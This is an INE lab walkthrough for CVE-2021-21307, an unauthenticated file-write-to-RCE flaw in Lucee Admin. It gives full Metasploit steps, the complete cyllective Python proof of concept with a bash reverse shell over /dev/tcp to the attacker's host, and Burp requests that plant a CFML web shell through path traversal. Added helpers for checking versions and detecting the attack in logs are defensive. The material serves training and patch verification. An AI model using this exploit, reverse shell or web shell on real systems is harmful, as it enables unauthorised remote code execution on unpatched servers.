[CVE-2021-21307] Lucee Server Arbitrary File Write
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Purpose:
We are learning how to exploit a vulnerable version of Lucee Server using the Metasploit Framework, a Python proof-of-concept script, and Burp Suite.
Technical difficulty: Beginner
Introduction
Lucee Server is a dynamic, Java-based (JSR-223) tag and scripting language used for rapid web application development. Lucee Admin versions before 5.3.7.47, 5.3.6.68 and 5.3.5.96 contain an unauthenticated remote code execution vulnerability. It is fixed in versions 5.3.7.47, 5.3.6.68 and 5.3.5.96; as a workaround, block access to the Lucee Administrator.
This vulnerability has been assigned the CVE id CVE-2021-21307. The Base CVSS score for this vulnerability is 9.8 Critical.
Reference: https://nvd.nist.gov/vuln/detail/CVE-2021-21307
The idea is to take advantage of an arbitrary file write in Lucee Administrator's imgProcess.cfm: it writes the contents of the imgSrc parameter to a path built from the file parameter, so a path-traversal value places a .cfm file in the Lucee web context, and requesting that file makes the server execute it.
In this lab, we will learn how to exploit the unauthenticated, remote code execution vulnerability in Lucee Administrator in a realistic environment and leverage it to gain shell access on the target server and retrieve the flag!
Lab Environment
In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of Lucee is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local:8888.
Objective: Exploit the unauthenticated remote code execution (RCE) vulnerability in Lucee Admin to gain shell access on the target server and retrieve the flag present in the system's root directory!
Tools
The best tools for this lab are:
- Nmap
- Curl
- Python
- A web browser
- Metasploit Framework
Step 1: Open the lab link to access the Kali GUI instance.
Step 2: Check if the provided machine/domain is reachable.
Command:
ping -c3 demo.ine.local
The provided machine is reachable. 192.52.49.3 is the IP address of the target machine.
Step 3: Check open ports on the provided machine.
Command:
nmap -sS -sV demo.ine.local
Apache Tomcat 9.0.39 is running on port 8888 on the target machine. Nmap only sees the servlet container; the Lucee version behind it is identified in the next step.
Step 4: Request a page that does not exist, so that the server answers with its error page.
Command:
http://demo.ine.local:8888/hdshgss.cfm
The error page Lucee returns for the missing .cfm file names the version: Lucee 5.3.7.43, which is below the fixed release 5.3.7.47 and therefore vulnerable.
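Step 4 only yields a version string; deciding whether that version is affected means comparing it, branch by branch, against the fixed releases named in the advisory above. The helper below is an added example for this walkthrough, not code from the lab, from Lucee or from the Metasploit module. It assumes the version shows up in the error page as "Lucee a.b.c.d" (the sample banner in the code is constructed, not captured from the target), and it treats every branch newer than 5.3.7 as fixed, which is an assumption the advisory text does not spell out.

```python
"""Classify a Lucee version against the CVE-2021-21307 affected ranges.

Added example for this walkthrough; not code from the lab, Lucee, or any
of the cited PoCs.  Boundaries come from the advisory quoted above:
5.3.7.x is fixed in 5.3.7.47, 5.3.6.x in 5.3.6.68, and everything older
in 5.3.5.96.  Treating branches newer than 5.3.7 as fixed is an assumption.
"""
import re
from typing import Optional, Tuple

# Fixed release per maintained branch (from the advisory on this page).
FIXED = {
    (5, 3, 7): (5, 3, 7, 47),
    (5, 3, 6): (5, 3, 6, 68),
}
# Everything below this (5.3.5.x and older branches) is affected.
FIXED_OLDEST = (5, 3, 5, 96)

# Assumption: the error page carries a banner of the form "Lucee a.b.c.d".
VERSION_RE = re.compile(r"Lucee\s+(\d+\.\d+\.\d+\.\d+)")


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Return the first 'Lucee a.b.c.d' found in text as a tuple of ints, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(version: Tuple[int, ...]) -> bool:
    """True if the four-part version lies inside an affected range."""
    if len(version) != 4:
        raise ValueError("expected a four-part Lucee version")
    branch = version[:3]
    if branch in FIXED:
        return version < FIXED[branch]
    if branch > (5, 3, 7):
        return False            # assumption: 5.3.8 and later ship the fix
    return version < FIXED_OLDEST


def assess(error_page: str) -> str:
    """Human-readable verdict for an error-page body."""
    version = parse_version(error_page)
    if version is None:
        return "unknown: no Lucee version banner in response"
    label = ".".join(str(p) for p in version)
    state = "VULNERABLE" if is_vulnerable(version) else "not affected"
    return f"Lucee {label}: {state}"


# Constructed sample of the banner Step 4 elicits; not captured from the lab.
SAMPLE_ERROR_PAGE = "<title>Lucee 5.3.7.43 Error (missing include)</title>"

if __name__ == "__main__":
    print(assess(SAMPLE_ERROR_PAGE))
```

The branch table matters: 5.3.6.67 is affected even though it is numerically "newer" than 5.3.5.96, so a single less-than comparison against the highest fixed version would misclassify it.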
Exploit using the Metasploit module
Step 5: First, check the attacker machine's IP address.
Command:
ifconfig
192.52.49.2 is the attacker machine's IP address.
Step 6: Start the msfconsole and search for the desired module.
Commands:
msfconsole -q
search lucee
Step 7: We get the desired module. Select it and list the options it requires:
Commands:
use exploit/linux/http/lucee_admin_imgprocess_file_write
show options
Step 8: Now run the following commands one by one:
Commands:
set RHOSTS 192.52.49.3
set LHOST 192.52.49.2
check
exploit
Note that RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address; both may differ in your environment.
We have successfully gained a command shell session.
Step 9: Read the flag.
Commands:
ls /
cat /flag.txt
FLAG: 7c5886ace9309cf2d23e6f556c79aa69
Exploit using Python script
We will use the script available at the following URL:
URL: https://github.com/cyllective/CVEs/blob/master/CVE-2021-21307/poc.py
The exploit has been provided by [cyllective](https://github.com/cyllective).
Step 10: From the terminal, save the following python code in a file named exploit.py.
#!/usr/bin/env python3
#
# Title: Remote Code Exploit in Lucee Admin
# CVE: CVE-2021-21307
# Affected: < 5.3.7.47
# Software: lucee/Lucee
# Research:
#   * rootxharsh
#   * iamnoooob
# PoC: cydave of cyllective AG
# References:
#   * https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
#   * https://github.com/advisories/GHSA-wq6x-g685-w5f2
#
import string
import random
import argparse

import requests
import urllib3

# Disable insecure https warnings (for self-signed SSL certificates)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", default="http://localhost:8888")
ap.add_argument("-s", "--host", required=True)             # attacker IP for the reverse shell
ap.add_argument("-p", "--port", required=True, type=int)   # attacker listener port
args = ap.parse_args()

base_url = args.target.rstrip("/")


def random_string():
    return "".join(random.choices(string.ascii_lowercase, k=12))


# CFML that spawns a bash reverse shell through <cfexecute> when the page is requested
payload = f"""\
<cfset args="-c 'bash -i >& /dev/tcp/{args.host}/{args.port} 0>&1'">
<cfoutput>
<cfexecute
    name="bash"
    arguments="#preservesinglequotes(args)#"
    timeout="2">
</cfexecute>
</cfoutput>
"""

with requests.Session() as session:
    img_process_url = f"{base_url}/lucee/admin/imgProcess.cfm"
    # The PoC treats a 2xx answer to a bare GET as a sign the target is patched
    response = session.get(img_process_url)
    if response.ok:
        print("[-] Target most likely not vulnerable.")
        exit()
    filename = random_string() + ".cfm"
    print("[*] Writing payload...")
    # First write creates the admin-ext-thumbnails/_ directory the traversal starts from
    session.post(f"{img_process_url}?file=_/" + random_string(), data={"imgSrc": random_string()})
    # Second write traverses out of the temp directory into the Lucee web context
    session.post(f"{img_process_url}?file=_/../../../context/{filename}", data={"imgSrc": payload})
    try:
        print("[*] Triggering shell...")
        session.get(f"{base_url}/lucee/{filename}", timeout=2)
    except requests.ReadTimeout:
        # The reverse shell keeps the request open, so a read timeout is expected
        pass
Check what arguments are required:
Command:
python3 exploit.py -h
Step 11: Open a second terminal and start a netcat listener on port 5555.
Command:
nc -nvlp 5555
Step 12: From the first terminal, run the script along with the required arguments:
Command:
python3 exploit.py -t http://demo.ine.local:8888 -s 192.52.49.2 -p 5555
Note: Remember to change the host IP address (attacker machine's IP address) in the above command as it may vary for you.
Step 13: Check the second terminal. The exploit worked and we got shell access.
Step 14: Read the flag.
Commands:
ls /
cat /flag.txt
FLAG: 7c5886ace9309cf2d23e6f556c79aa69
Exploit using Burp Suite
Reference: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21307.yaml
Step 15: Start Burp Suite, go to the Repeater tab and paste the following HTTP request. imgProcess.cfm writes the value of imgSrc to a path built from the file parameter under the Lucee temp directory; this first request only makes it create that directory (*/opt/lucee/web/temp/admin-ext-thumbnails* in this lab) so that the relative traversal in the next request has a starting point. Burp's Repeater adds the Content-Length header automatically.
Request
POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
Host: demo.ine.local:8888
Content-Type: application/x-www-form-urlencoded

imgSrc=a
Step 16: Click on the pencil icon on the top right corner to configure target details as shown.
- Host: demo.ine.local
- Port: 8888
Click OK and then hit Send.
Step 17: Replace the request in Repeater with the following and hit Send. The file parameter now traverses out of the thumbnail directory into the Lucee web context, and imgSrc carries a small CFML web shell that is written as randomfile.cfm.
Request
POST /lucee/admin/imgProcess.cfm?file=/../../../context/randomfile.cfm HTTP/1.1
Host: demo.ine.local:8888
Content-Type: application/x-www-form-urlencoded

imgSrc=
<cfoutput>
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse> value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
</cfoutput>
Step 18: Now, let's try executing a command. Replace the request in the repeater with the following.
Request
POST /lucee/randomfile.cfm HTTP/1.1
Host: demo.ine.local:8888
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

cmd=id&opts=&timeout=5
This submits id as the command. Hit Send: the response renders the output of id, confirming that the web shell executes commands as the user the Lucee process runs as.
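Both the Python script and the Burp requests above leave the same trace on the server: a POST to /lucee/admin/imgProcess.cfm whose file parameter steps out of the thumbnail directory with "..", followed by a request from the same client for a freshly written .cfm under /lucee/. The detector below is an added example for this walkthrough (not part of the lab, Lucee or any of the PoCs) that runs over constructed Tomcat access-log lines. It assumes Tomcat's default access-log pattern (%h %l %u %t "%r" %s %b); the IP addresses, timestamps and file names in the sample are made up.

```python
"""Flag CVE-2021-21307 exploitation attempts in Tomcat access-log lines.

Added example for this walkthrough; not part of the lab, Lucee or the
PoCs above.  Assumes Tomcat's default access-log pattern
%h %l %u %t "%r" %s %b and keys on the two requests every path on this
page has in common: a traversal write through imgProcess.cfm, then a
request for the dropped .cfm from the same client.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def traversal_in_file_param(uri: str) -> bool:
    """True if this is imgProcess.cfm and its file= parameter contains a '..' segment."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/lucee/admin/imgProcess.cfm"):
        return False
    for value in parse_qs(parts.query).get("file", []):
        decoded = unquote(value)            # parse_qs decoded once; handle double encoding
        if ".." in decoded.replace("\\", "/").split("/"):
            return True
    return False


def detect(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, alert_kind, uri) for write primitives and follow-up triggers."""
    alerts: List[Tuple[str, str, str]] = []
    primed = set()   # clients that have already issued a traversal write
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, uri = rec["ip"], rec["method"], rec["uri"]
        path = urlsplit(uri).path
        if method == "POST" and traversal_in_file_param(uri):
            alerts.append((ip, "file-write", uri))
            primed.add(ip)
        elif (ip in primed and path.startswith("/lucee/")
              and not path.startswith("/lucee/admin/") and path.endswith(".cfm")):
            alerts.append((ip, "payload-trigger", uri))
    return alerts


# Constructed sample log; addresses, timestamps and file names are made up.
SAMPLE_LOG = [
    '192.52.49.2 - - [10/Feb/2021:10:15:01 +0000] "GET /lucee/admin/imgProcess.cfm HTTP/1.1" 500 1203',
    '192.52.49.2 - - [10/Feb/2021:10:15:02 +0000] "POST /lucee/admin/imgProcess.cfm?file=_/abcdefghijkl HTTP/1.1" 200 0',
    '192.52.49.2 - - [10/Feb/2021:10:15:02 +0000] "POST /lucee/admin/imgProcess.cfm?file=_/../../../context/qwertyuiopas.cfm HTTP/1.1" 200 0',
    '192.52.49.2 - - [10/Feb/2021:10:15:03 +0000] "GET /lucee/qwertyuiopas.cfm HTTP/1.1" 200 0',
    '10.0.0.5 - - [10/Feb/2021:10:16:00 +0000] "GET /lucee/index.cfm HTTP/1.1" 200 541',
    '10.0.0.7 - - [10/Feb/2021:10:17:00 +0000] "POST /lucee/admin/imgProcess.cfm?file=%2F%2e%2e%2F%2e%2e%2Fcontext%2Fz.cfm HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, kind, uri in detect(SAMPLE_LOG):
        print(f"{kind:16} {ip:14} {uri}")
```

The first POST in the Python script (file=_/ followed by a random name) is deliberately not flagged on its own: it is the directory-priming request and contains no traversal, so the rule waits for the second, traversing write before it starts watching that client's .cfm requests.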
Conclusion
In this lab, we exploited the unauthenticated, remote code execution vulnerability in Lucee Admin using the Metasploit module, Python script, and Burp Suite.
References
- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-21307
- PoC: https://github.com/cyllective/CVEs/blob/master/CVE-2021-21307/poc.py
- Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21307.yaml
Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!